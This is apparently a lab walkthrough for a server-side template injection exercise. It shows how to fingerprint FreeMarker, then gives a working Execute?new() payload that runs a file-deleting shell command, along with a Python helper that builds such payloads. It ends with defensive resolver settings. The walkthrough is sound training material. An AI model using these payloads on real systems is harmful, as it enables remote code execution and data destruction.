28.3 Lab: Server-side template injection using documentation
Karthikeyan Nagaraj · 2 min read · Jun 8, 2024
Description
This lab is vulnerable to server-side template injection. To solve the lab, identify the template engine and use the documentation to work out how to execute arbitrary code, then delete the morale.txt file from Carlos's home directory.
You can log in to your own account using the following credentials:
content-manager:C0nt3ntM4n4g3r
Solution
- Log in and edit one of the product description templates. Notice that this template engine uses the syntax `${someExpression}` to render the result of an expression on the page. Either enter your own expression or change one of the existing ones to refer to an object that doesn't exist, such as `${foobar}`, and save the template. The error message in the output shows that the FreeMarker template engine is being used.
- Study the FreeMarker documentation and find that the appendix contains an FAQ section with the question "Can I allow users to upload templates and what are the security implications?". The answer describes how the `new()` built-in can be dangerous.
- Go to the "Built-in reference" section of the documentation and find the entry for `new()`. This entry further describes how `new()` is a security concern because it can be used to create arbitrary Java objects that implement the `TemplateModel` interface.
- Load the JavaDoc for the `TemplateModel` interface and review the list of "All Known Implementing Classes".
- Observe that there is a class called `Execute`, which can be used to execute arbitrary shell commands.
- Either attempt to construct your own exploit, or find @albinowax's exploit on the PortSwigger research page and adapt it as follows:

```
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("rm /home/carlos/morale.txt") }
```

- Remove the invalid syntax that you entered earlier, and insert your new payload into the template.
- Save the template and view the product page to solve the lab.
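To make the probe, fingerprint and exploit steps above concrete, here is an added helper script; it is not part of the original write-up, the lab, or FreeMarker itself. It builds the `${foobar}` probe, recognises FreeMarker from the error banner, and assembles the `Execute` payload while quoting the command as a FreeMarker string literal, so a command containing double quotes or `${...}` does not break the template. The error page it is run against is constructed to mirror the shape of a real FreeMarker "evaluated to null or missing" error and is not captured from the lab; the lab's login and template-edit endpoints are not assumed, so the script makes no HTTP requests.

```python
"""Probe, fingerprint and payload helpers for the FreeMarker SSTI lab.

Added example for this write-up; not code from the original post, from
PortSwigger, or from FreeMarker. It makes no HTTP requests (the lab's
login and template-edit endpoints are not assumed); it only produces the
strings you paste into the template editor and reads the response text
you get back.
"""
import re

# Constructed sample (not captured from the lab): the shape of the error
# the product page shows after saving a template that contains ${foobar}.
SAMPLE_ERROR_PAGE = """\
<h1>Internal Server Error</h1>
<pre>FreeMarker template error:
The following has evaluated to null or missing:
==> foobar  [in template "product-1" at line 3, column 3]
</pre>
"""

# Real TemplateModel implementation that runs its string argument as a shell
# command; this is the class the write-up finds in the TemplateModel JavaDoc.
EXECUTE_CLASS = "freemarker.template.utility.Execute"


def undefined_variable_probe(name: str = "foobar") -> str:
    """Step 1: interpolate a name the template has no value for."""
    return "${" + name + "}"


def identify_engine(body: str):
    """Step 1 (continued): FreeMarker names itself in its error banner.

    Returns "freemarker" or None; other engines are not fingerprinted here.
    """
    if re.search(r"FreeMarker template error", body):
        return "freemarker"
    return None


def missing_variable_name(body: str):
    """Pull the missing name out of the '==> name' line of the error.

    Seeing the name you injected echoed back confirms your input reached
    the template engine rather than a later HTML-escaping step.
    """
    match = re.search(r"==>\s*(\S+)", body)
    return match.group(1) if match else None


def freemarker_string_literal(command: str) -> str:
    """Quote command as a FreeMarker string literal.

    FreeMarker string literals take backslash escapes, and ${...} inside a
    literal is itself interpolated, so backslashes, double quotes and
    braces are escaped (backslash-backslash, backslash-quote and
    backslash-brace are all documented FreeMarker escape sequences).
    """
    escaped = (command.replace("\\", "\\\\")
                      .replace('"', '\\"')
                      .replace("{", "\\{"))
    return '"' + escaped + '"'


def freemarker_execute_payload(command: str, var: str = "ex") -> str:
    """The two-part payload from the write-up: assign, then call."""
    return (f'<#assign {var}={freemarker_string_literal(EXECUTE_CLASS)}?new()>'
            f'${{ {var}({freemarker_string_literal(command)}) }}')


def freemarker_execute_payload_inline(command: str) -> str:
    """Same primitive as a single interpolation, with no #assign directive."""
    return ('${' + freemarker_string_literal(EXECUTE_CLASS) + '?new()('
            + freemarker_string_literal(command) + ')}')


if __name__ == "__main__":
    print("probe:  ", undefined_variable_probe())
    engine = identify_engine(SAMPLE_ERROR_PAGE)
    print("engine: ", engine, "echoed name:", missing_variable_name(SAMPLE_ERROR_PAGE))
    if engine == "freemarker":
        print("payload:", freemarker_execute_payload("rm /home/carlos/morale.txt"))
```

Run it directly to print the probe and the payload; paste the probe into the template editor first, feed the resulting error page to `identify_engine`, and only then paste the payload. On the defensive side, the FreeMarker documentation for the `new` built-in states that the classes it may instantiate are controlled by `Configuration.setNewBuiltinClassResolver(...)`: `TemplateClassResolver.SAFER_RESOLVER` refuses `Execute`, `ObjectConstructor` and `JythonRuntime`, and `TemplateClassResolver.ALLOWS_NOTHING_RESOLVER` disables `?new` entirely, which is the setting to use whenever templates come from users.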
Thank you for Reading!
Happy Ethical Hacking ~
Author: Karthikeyan Nagaraj ~ Cyberw1ng